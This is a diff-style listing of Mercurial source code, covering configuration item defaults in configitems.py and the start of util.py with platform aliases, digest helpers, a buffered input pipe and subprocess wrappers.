779 782 priority=-1,
780 783 )
781 784 coreconfigitem('merge-tools', br'.*\.symlink$',
782 785 default=False,
783 786 generic=True,
784 787 priority=-1,
785 788 )
786 789 coreconfigitem('pager', 'attend-.*',
787 790 default=dynamicdefault,
788 791 generic=True,
789 792 )
790 793 coreconfigitem('pager', 'ignore',
791 794 default=list,
792 795 )
793 796 coreconfigitem('pager', 'pager',
794 797 default=dynamicdefault,
795 798 )
796 799 coreconfigitem('patch', 'eol',
797 800 default='strict',
798 801 )
799 802 coreconfigitem('patch', 'fuzz',
800 803 default=2,
801 804 )
802 805 coreconfigitem('paths', 'default',
803 806 default=None,
804 807 )
805 808 coreconfigitem('paths', 'default-push',
806 809 default=None,
807 810 )
808 811 coreconfigitem('paths', '.*',
809 812 default=None,
810 813 generic=True,
811 814 )
812 815 coreconfigitem('phases', 'checksubrepos',
813 816 default='follow',
814 817 )
815 818 coreconfigitem('phases', 'new-commit',
816 819 default='draft',
817 820 )
818 821 coreconfigitem('phases', 'publish',
819 822 default=True,
820 823 )
821 824 coreconfigitem('profiling', 'enabled',
822 825 default=False,
823 826 )
824 827 coreconfigitem('profiling', 'format',
825 828 default='text',
826 829 )
827 830 coreconfigitem('profiling', 'freq',
828 831 default=1000,
829 832 )
830 833 coreconfigitem('profiling', 'limit',
831 834 default=30,
832 835 )
833 836 coreconfigitem('profiling', 'nested',
834 837 default=0,
835 838 )
836 839 coreconfigitem('profiling', 'output',
837 840 default=None,
838 841 )
839 842 coreconfigitem('profiling', 'showmax',
840 843 default=0.999,
841 844 )
842 845 coreconfigitem('profiling', 'showmin',
843 846 default=dynamicdefault,
844 847 )
845 848 coreconfigitem('profiling', 'sort',
846 849 default='inlinetime',
847 850 )
848 851 coreconfigitem('profiling', 'statformat',
849 852 default='hotpath',
850 853 )
851 854 coreconfigitem('profiling', 'type',
852 855 default='stat',
853 856 )
854 857 coreconfigitem('progress', 'assume-tty',
855 858 default=False,
856 859 )
857 860 coreconfigitem('progress', 'changedelay',
858 861 default=1,
859 862 )
860 863 coreconfigitem('progress', 'clear-complete',
861 864 default=True,
862 865 )
863 866 coreconfigitem('progress', 'debug',
864 867 default=False,
865 868 )
866 869 coreconfigitem('progress', 'delay',
867 870 default=3,
868 871 )
869 872 coreconfigitem('progress', 'disable',
870 873 default=False,
871 874 )
872 875 coreconfigitem('progress', 'estimateinterval',
873 876 default=60.0,
874 877 )
875 878 coreconfigitem('progress', 'format',
876 879 default=lambda: ['topic', 'bar', 'number', 'estimate'],
877 880 )
878 881 coreconfigitem('progress', 'refresh',
879 882 default=0.1,
880 883 )
881 884 coreconfigitem('progress', 'width',
882 885 default=dynamicdefault,
883 886 )
884 887 coreconfigitem('push', 'pushvars.server',
885 888 default=False,
886 889 )
887 890 coreconfigitem('server', 'bookmarks-pushkey-compat',
888 891 default=True,
889 892 )
890 893 coreconfigitem('server', 'bundle1',
891 894 default=True,
892 895 )
893 896 coreconfigitem('server', 'bundle1gd',
894 897 default=None,
895 898 )
896 899 coreconfigitem('server', 'bundle1.pull',
897 900 default=None,
898 901 )
899 902 coreconfigitem('server', 'bundle1gd.pull',
900 903 default=None,
901 904 )
902 905 coreconfigitem('server', 'bundle1.push',
903 906 default=None,
904 907 )
905 908 coreconfigitem('server', 'bundle1gd.push',
906 909 default=None,
907 910 )
908 911 coreconfigitem('server', 'compressionengines',
909 912 default=list,
910 913 )
911 914 coreconfigitem('server', 'concurrent-push-mode',
912 915 default='strict',
913 916 )
914 917 coreconfigitem('server', 'disablefullbundle',
915 918 default=False,
916 919 )
917 920 coreconfigitem('server', 'maxhttpheaderlen',
918 921 default=1024,
919 922 )
920 923 coreconfigitem('server', 'preferuncompressed',
921 924 default=False,
922 925 )
923 926 coreconfigitem('server', 'uncompressed',
924 927 default=True,
925 928 )
926 929 coreconfigitem('server', 'uncompressedallowsecret',
927 930 default=False,
928 931 )
929 932 coreconfigitem('server', 'validate',
930 933 default=False,
931 934 )
932 935 coreconfigitem('server', 'zliblevel',
933 936 default=-1,
934 937 )
935 938 coreconfigitem('share', 'pool',
936 939 default=None,
937 940 )
938 941 coreconfigitem('share', 'poolnaming',
939 942 default='identity',
940 943 )
941 944 coreconfigitem('smtp', 'host',
942 945 default=None,
943 946 )
944 947 coreconfigitem('smtp', 'local_hostname',
945 948 default=None,
946 949 )
947 950 coreconfigitem('smtp', 'password',
948 951 default=None,
949 952 )
950 953 coreconfigitem('smtp', 'port',
951 954 default=dynamicdefault,
952 955 )
953 956 coreconfigitem('smtp', 'tls',
954 957 default='none',
955 958 )
956 959 coreconfigitem('smtp', 'username',
957 960 default=None,
958 961 )
959 962 coreconfigitem('sparse', 'missingwarning',
960 963 default=True,
961 964 )
962 965 coreconfigitem('subrepos', 'allowed',
963 966 default=dynamicdefault, # to make backporting simpler
964 967 )
965 968 coreconfigitem('subrepos', 'hg:allowed',
966 969 default=dynamicdefault,
967 970 )
968 971 coreconfigitem('subrepos', 'git:allowed',
969 972 default=dynamicdefault,
970 973 )
971 974 coreconfigitem('subrepos', 'svn:allowed',
972 975 default=dynamicdefault,
973 976 )
974 977 coreconfigitem('templates', '.*',
975 978 default=None,
976 979 generic=True,
977 980 )
978 981 coreconfigitem('trusted', 'groups',
979 982 default=list,
980 983 )
981 984 coreconfigitem('trusted', 'users',
982 985 default=list,
983 986 )
984 987 coreconfigitem('ui', '_usedassubrepo',
985 988 default=False,
986 989 )
987 990 coreconfigitem('ui', 'allowemptycommit',
988 991 default=False,
989 992 )
990 993 coreconfigitem('ui', 'archivemeta',
991 994 default=True,
992 995 )
993 996 coreconfigitem('ui', 'askusername',
994 997 default=False,
995 998 )
996 999 coreconfigitem('ui', 'clonebundlefallback',
997 1000 default=False,
998 1001 )
999 1002 coreconfigitem('ui', 'clonebundleprefers',
1000 1003 default=list,
1001 1004 )
1002 1005 coreconfigitem('ui', 'clonebundles',
1003 1006 default=True,
1004 1007 )
1005 1008 coreconfigitem('ui', 'color',
1006 1009 default='auto',
1007 1010 )
1008 1011 coreconfigitem('ui', 'commitsubrepos',
1009 1012 default=False,
1010 1013 )
1011 1014 coreconfigitem('ui', 'debug',
1012 1015 default=False,
1013 1016 )
1014 1017 coreconfigitem('ui', 'debugger',
1015 1018 default=None,
1016 1019 )
1017 1020 coreconfigitem('ui', 'editor',
1018 1021 default=dynamicdefault,
1019 1022 )
1020 1023 coreconfigitem('ui', 'fallbackencoding',
1021 1024 default=None,
1022 1025 )
1023 1026 coreconfigitem('ui', 'forcecwd',
1024 1027 default=None,
1025 1028 )
1026 1029 coreconfigitem('ui', 'forcemerge',
1027 1030 default=None,
1028 1031 )
1029 1032 coreconfigitem('ui', 'formatdebug',
1030 1033 default=False,
1031 1034 )
1032 1035 coreconfigitem('ui', 'formatjson',
1033 1036 default=False,
1034 1037 )
1035 1038 coreconfigitem('ui', 'formatted',
1036 1039 default=None,
1037 1040 )
1038 1041 coreconfigitem('ui', 'graphnodetemplate',
1039 1042 default=None,
1040 1043 )
1041 1044 coreconfigitem('ui', 'interactive',
1042 1045 default=None,
1043 1046 )
1044 1047 coreconfigitem('ui', 'interface',
1045 1048 default=None,
1046 1049 )
1047 1050 coreconfigitem('ui', 'interface.chunkselector',
1048 1051 default=None,
1049 1052 )
1050 1053 coreconfigitem('ui', 'logblockedtimes',
1051 1054 default=False,
1052 1055 )
1053 1056 coreconfigitem('ui', 'logtemplate',
1054 1057 default=None,
1055 1058 )
1056 1059 coreconfigitem('ui', 'merge',
1057 1060 default=None,
1058 1061 )
1059 1062 coreconfigitem('ui', 'mergemarkers',
1060 1063 default='basic',
1061 1064 )
1062 1065 coreconfigitem('ui', 'mergemarkertemplate',
1063 1066 default=('{node|short} '
1064 1067 '{ifeq(tags, "tip", "", '
1065 1068 'ifeq(tags, "", "", "{tags} "))}'
1066 1069 '{if(bookmarks, "{bookmarks} ")}'
1067 1070 '{ifeq(branch, "default", "", "{branch} ")}'
1068 1071 '- {author|user}: {desc|firstline}')
1069 1072 )
1070 1073 coreconfigitem('ui', 'nontty',
1071 1074 default=False,
1072 1075 )
1073 1076 coreconfigitem('ui', 'origbackuppath',
1074 1077 default=None,
1075 1078 )
1076 1079 coreconfigitem('ui', 'paginate',
1077 1080 default=True,
1078 1081 )
1079 1082 coreconfigitem('ui', 'patch',
1080 1083 default=None,
1081 1084 )
1082 1085 coreconfigitem('ui', 'portablefilenames',
1083 1086 default='warn',
1084 1087 )
1085 1088 coreconfigitem('ui', 'promptecho',
1086 1089 default=False,
1087 1090 )
1088 1091 coreconfigitem('ui', 'quiet',
1089 1092 default=False,
1090 1093 )
1091 1094 coreconfigitem('ui', 'quietbookmarkmove',
1092 1095 default=False,
1093 1096 )
1094 1097 coreconfigitem('ui', 'remotecmd',
1095 1098 default='hg',
1096 1099 )
1097 1100 coreconfigitem('ui', 'report_untrusted',
1098 1101 default=True,
1099 1102 )
1100 1103 coreconfigitem('ui', 'rollback',
1101 1104 default=True,
1102 1105 )
1103 1106 coreconfigitem('ui', 'slash',
1104 1107 default=False,
1105 1108 )
1106 1109 coreconfigitem('ui', 'ssh',
1107 1110 default='ssh',
1108 1111 )
1109 1112 coreconfigitem('ui', 'ssherrorhint',
1110 1113 default=None,
1111 1114 )
1112 1115 coreconfigitem('ui', 'statuscopies',
1113 1116 default=False,
1114 1117 )
1115 1118 coreconfigitem('ui', 'strict',
1116 1119 default=False,
1117 1120 )
1118 1121 coreconfigitem('ui', 'style',
1119 1122 default='',
1120 1123 )
1121 1124 coreconfigitem('ui', 'supportcontact',
1122 1125 default=None,
1123 1126 )
1124 1127 coreconfigitem('ui', 'textwidth',
1125 1128 default=78,
1126 1129 )
1127 1130 coreconfigitem('ui', 'timeout',
1128 1131 default='600',
1129 1132 )
1130 1133 coreconfigitem('ui', 'timeout.warn',
1131 1134 default=0,
1132 1135 )
1133 1136 coreconfigitem('ui', 'traceback',
1134 1137 default=False,
1135 1138 )
1136 1139 coreconfigitem('ui', 'tweakdefaults',
1137 1140 default=False,
1138 1141 )
1139 1142 coreconfigitem('ui', 'username',
1140 1143 alias=[('ui', 'user')]
1141 1144 )
1142 1145 coreconfigitem('ui', 'verbose',
1143 1146 default=False,
1144 1147 )
1145 1148 coreconfigitem('verify', 'skipflags',
1146 1149 default=None,
1147 1150 )
1148 1151 coreconfigitem('web', 'allowbz2',
1149 1152 default=False,
1150 1153 )
1151 1154 coreconfigitem('web', 'allowgz',
1152 1155 default=False,
1153 1156 )
1154 1157 coreconfigitem('web', 'allow-pull',
1155 1158 alias=[('web', 'allowpull')],
1156 1159 default=True,
1157 1160 )
1158 1161 coreconfigitem('web', 'allow-push',
1159 1162 alias=[('web', 'allow_push')],
1160 1163 default=list,
1161 1164 )
1162 1165 coreconfigitem('web', 'allowzip',
1163 1166 default=False,
1164 1167 )
1165 1168 coreconfigitem('web', 'archivesubrepos',
1166 1169 default=False,
1167 1170 )
1168 1171 coreconfigitem('web', 'cache',
1169 1172 default=True,
1170 1173 )
1171 1174 coreconfigitem('web', 'contact',
1172 1175 default=None,
1173 1176 )
1174 1177 coreconfigitem('web', 'deny_push',
1175 1178 default=list,
1176 1179 )
1177 1180 coreconfigitem('web', 'guessmime',
1178 1181 default=False,
1179 1182 )
1180 1183 coreconfigitem('web', 'hidden',
1181 1184 default=False,
1182 1185 )
1183 1186 coreconfigitem('web', 'labels',
1184 1187 default=list,
1185 1188 )
1186 1189 coreconfigitem('web', 'logoimg',
1187 1190 default='hglogo.png',
1188 1191 )
1189 1192 coreconfigitem('web', 'logourl',
1190 1193 default='https://mercurial-scm.org/',
1191 1194 )
1192 1195 coreconfigitem('web', 'accesslog',
1193 1196 default='-',
1194 1197 )
1195 1198 coreconfigitem('web', 'address',
1196 1199 default='',
1197 1200 )
1198 1201 coreconfigitem('web', 'allow_archive',
1199 1202 default=list,
1200 1203 )
1201 1204 coreconfigitem('web', 'allow_read',
1202 1205 default=list,
1203 1206 )
1204 1207 coreconfigitem('web', 'baseurl',
1205 1208 default=None,
1206 1209 )
1207 1210 coreconfigitem('web', 'cacerts',
1208 1211 default=None,
1209 1212 )
1210 1213 coreconfigitem('web', 'certificate',
1211 1214 default=None,
1212 1215 )
1213 1216 coreconfigitem('web', 'collapse',
1214 1217 default=False,
1215 1218 )
1216 1219 coreconfigitem('web', 'csp',
1217 1220 default=None,
1218 1221 )
1219 1222 coreconfigitem('web', 'deny_read',
1220 1223 default=list,
1221 1224 )
1222 1225 coreconfigitem('web', 'descend',
1223 1226 default=True,
1224 1227 )
1225 1228 coreconfigitem('web', 'description',
1226 1229 default="",
1227 1230 )
1228 1231 coreconfigitem('web', 'encoding',
1229 1232 default=lambda: encoding.encoding,
1230 1233 )
1231 1234 coreconfigitem('web', 'errorlog',
1232 1235 default='-',
1233 1236 )
1234 1237 coreconfigitem('web', 'ipv6',
1235 1238 default=False,
1236 1239 )
1237 1240 coreconfigitem('web', 'maxchanges',
1238 1241 default=10,
1239 1242 )
1240 1243 coreconfigitem('web', 'maxfiles',
1241 1244 default=10,
1242 1245 )
1243 1246 coreconfigitem('web', 'maxshortchanges',
1244 1247 default=60,
1245 1248 )
1246 1249 coreconfigitem('web', 'motd',
1247 1250 default='',
1248 1251 )
1249 1252 coreconfigitem('web', 'name',
1250 1253 default=dynamicdefault,
1251 1254 )
1252 1255 coreconfigitem('web', 'port',
1253 1256 default=8000,
1254 1257 )
1255 1258 coreconfigitem('web', 'prefix',
1256 1259 default='',
1257 1260 )
1258 1261 coreconfigitem('web', 'push_ssl',
1259 1262 default=True,
1260 1263 )
1261 1264 coreconfigitem('web', 'refreshinterval',
1262 1265 default=20,
1263 1266 )
1264 1267 coreconfigitem('web', 'server-header',
1265 1268 default=None,
1266 1269 )
1267 1270 coreconfigitem('web', 'staticurl',
1268 1271 default=None,
1269 1272 )
1270 1273 coreconfigitem('web', 'stripes',
1271 1274 default=1,
1272 1275 )
1273 1276 coreconfigitem('web', 'style',
1274 1277 default='paper',
1275 1278 )
1276 1279 coreconfigitem('web', 'templates',
1277 1280 default=None,
1278 1281 )
1279 1282 coreconfigitem('web', 'view',
1280 1283 default='served',
1281 1284 )
1282 1285 coreconfigitem('worker', 'backgroundclose',
1283 1286 default=dynamicdefault,
1284 1287 )
1285 1288 # Windows defaults to a limit of 512 open files. A buffer of 128
1286 1289 # should give us enough headway.
1287 1290 coreconfigitem('worker', 'backgroundclosemaxqueue',
1288 1291 default=384,
1289 1292 )
1290 1293 coreconfigitem('worker', 'backgroundcloseminfilecount',
1291 1294 default=2048,
1292 1295 )
1293 1296 coreconfigitem('worker', 'backgroundclosethreadcount',
1294 1297 default=4,
1295 1298 )
1296 1299 coreconfigitem('worker', 'enabled',
1297 1300 default=True,
1298 1301 )
1299 1302 coreconfigitem('worker', 'numcpus',
1300 1303 default=None,
1301 1304 )
1302 1305
# Rebase-related configuration lives in core (rather than in the rebase
# extension) because other extensions do strange things with it.  For
# example, shelve imports the rebase extension to reuse some of its bits
# without formally loading it.
coreconfigitem('commands', 'rebase.requiredest',
    default=False,
)
coreconfigitem('experimental', 'rebaseskipobsolete',
    default=True,
)
coreconfigitem('rebase', 'singletransaction',
    default=False,
)
coreconfigitem('rebase', 'experimental.inmemory',
    default=False,
)
@@ -1,4365 +1,4373 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
# Modules resolved through Mercurial's policy machinery (presumably choosing
# between C and pure-Python implementations — see the policy module).
base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

# Python 2/3 compatibility names re-exported from pycompat so the rest of
# the codebase can use util.* without version checks.
cookielib = pycompat.cookielib
empty = pycompat.empty
httplib = pycompat.httplib
pickle = pycompat.pickle
queue = pycompat.queue
socketserver = pycompat.socketserver
stderr = pycompat.stderr
stdin = pycompat.stdin
stdout = pycompat.stdout
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
85 85
def isatty(fp):
    """Return whether `fp` reports being attached to a terminal.

    File-like objects lacking an isatty() method are treated as
    non-interactive and yield False.
    """
    try:
        result = fp.isatty()
    except AttributeError:
        # not every file-like object implements isatty()
        return False
    return result
91 91
# glibc determines buffering on first write to stdout - if we replace a TTY
# destined stdout with a pipe destined stdout (e.g. pager), we want line
# buffering
if isatty(stdout):
    stdout = os.fdopen(stdout.fileno(), r'wb', 1)

# Select the platform-specific implementation module; the rest of this file
# re-exports names from it under a stable `platform` alias.
if pycompat.iswindows:
    from . import windows as platform
    # winstdout presumably wraps stdout to work around Windows-specific
    # write issues — see the windows module for details.
    stdout = platform.winstdout(stdout)
else:
    from . import posix as platform
103 103
_ = i18n._

# Re-export the platform-specific implementations under stable module-level
# names so callers can use util.* without caring about the host platform.
bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
executablepath = platform.executablepath
expandglobs = platform.expandglobs
explainexit = platform.explainexit
findexe = platform.findexe
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
gethgcmd = platform.gethgcmd
getuser = platform.getuser
getpid = os.getpid
groupmembers = platform.groupmembers
groupname = platform.groupname
hidewindow = platform.hidewindow
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
popen = platform.popen
posixfile = platform.posixfile
quotecommand = platform.quotecommand
readpipe = platform.readpipe
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setbinary = platform.setbinary
setflags = platform.setflags
setsignalhandler = platform.setsignalhandler
shellquote = platform.shellquote
shellsplit = platform.shellsplit
spawndetached = platform.spawndetached
split = platform.split
sshargs = platform.sshargs
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
testpid = platform.testpid
umask = platform.umask
unlink = platform.unlink
username = platform.username

# The following osutil attributes are optional (not every osutil
# implementation provides them); their absence is tolerated silently.
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass
try:
    setprocname = osutil.setprocname
except AttributeError:
    pass
try:
    unblocksignal = osutil.unblocksignal
except AttributeError:
    pass
176 176
# Python compatibility

_notset = object()

def safehasattr(thing, attr):
    """Return True when `thing` has an attribute named `attr`.

    Implemented with getattr() and a private sentinel rather than hasattr()
    (presumably because Python 2's hasattr() swallows arbitrary exceptions
    — TODO confirm against project history).
    """
    found = getattr(thing, attr, _notset)
    return found is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2: identity means there is nothing to
        # rewrite, so return the input object itself (same identity, no
        # container copies).
        return xs
    return _rapply(f, xs)
216 216
def bitsfrom(container):
    """OR together every element of `container` into a single bitmask."""
    mask = 0
    for flag in container:
        mask = mask | flag
    return mask
222 222
# Python 2.6 still has deprecation warnings enabled by default.  We do not
# want to display anything to standard users, so only emit Python
# deprecation warnings when the test-suite environment variable is set.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
243 243
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning.

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    msg += ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
# Map of supported digest names to their hashlib constructors.
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

# Sanity check: every digest in the strength ranking must be supported.
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
264 264
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        # maps digest name -> live hashlib hash object
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` into every tracked digest."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the current hex digest for digest type ``key``."""
        if key not in DIGESTS:
            # BUG FIX: this previously interpolated ``k`` — the stale
            # module-level loop variable left over from the sanity-check
            # loop over DIGESTS_BY_STRENGTH — instead of ``key``, so the
            # error message named the wrong digest type.
            raise Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
311 311
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh                       # wrapped file handle
        self._size = size                   # expected total byte count
        self._got = 0                       # bytes read so far
        self._digests = dict(digests)       # name -> expected hex digest
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, feeding the digester as we go."""
        data = self._fh.read(length)
        self._digester.update(data)
        self._got += len(data)
        return data

    def validate(self):
        """Raise Abort unless the observed size and every digest match."""
        if self._got != self._size:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for name, expected in self._digests.items():
            actual = self._digester[name]
            if actual != expected:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (name, expected, actual))
343 343
# Python 3 dropped the builtin buffer(); emulate it with zero-copy
# memoryview slicing.
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

# Passed as the subprocess close_fds= argument by the popen helpers below;
# only enabled on POSIX.
closefds = pycompat.isposix

# Read granularity for bufferedinputpipe, in bytes.
_chunksize = 4096
355 355
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input   # underlying unbuffered pipe-like object
        self._buffer = []     # buffered chunks, oldest first
        self._eof = False     # True once the underlying pipe hit EOF
        self._lenbuf = 0      # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """Return up to `size` bytes (less only at EOF)."""
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        """Return one line, up to and including the newline (or EOF)."""
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the newline within the *last* buffered chunk
        # (earlier chunks were already scanned on previous iterations).
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        # number of bytes making up the line, including the newline itself
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks so a single slice suffices
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # raw os.read (not self._input.read) so no hidden stdlib buffering
        # can hold data that polling would then miss
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
458 458
def mmapread(fp):
    """Return a read-only mmap of `fp`'s contents ('' for empty files).

    `fp` may be a file object (its fileno() is used) or a raw file
    descriptor.
    """
    # Resolve the descriptor *before* entering the try block: previously a
    # fileno() call that raised ValueError (e.g. on a closed file) left
    # ``fd`` unbound, so the except clause crashed with UnboundLocalError
    # instead of propagating the real error.
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
469 469
def popen2(cmd, env=None, newlines=False):
    """Spawn `cmd` through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
480 480
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but return only the (stdin, stdout, stderr) pipes."""
